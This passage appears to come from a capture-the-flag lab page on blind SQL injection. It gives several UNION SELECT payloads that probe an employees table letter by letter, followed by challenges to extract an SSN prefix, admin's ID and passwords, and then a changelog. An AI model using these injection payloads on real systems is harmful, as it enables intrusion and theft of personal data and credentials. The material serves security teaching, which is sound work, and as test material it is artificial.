x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='B'#
x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='A'#
x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)>'A'#
x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND length(name)>2#
The flag is the first three digits of Bill Gates' SSN.
ED 103.3.3 ID (5 pts extra)
The flag is admin's ID.
ED 103.3.4 Length (5 pts extra)
The flag is the length of Bill Gates' password.
Hint: First find BIll Gates' ID. Then guess at
the name of the field and table containing passwords.
Error messages will tell you if your guess is wrong.
ED 103.3.5 Bill's Password (20 pts extra)
The flag is Bill Gates' password.
ED 103.3.6 Password (30 pts extra)
The flag is admin's password.
Updated 5-20-19
Hint about user-agent added 5-21-19
Hint added to 103.3.4
Point total corrected 9-9-19
Hint added to 103.1.2 9-11-19
Example of WHERE added to Section 1 2-4-21
Background color changed 1-18-22
103.2.6 challenge rephrased 2-12-23
Video added 3-15-23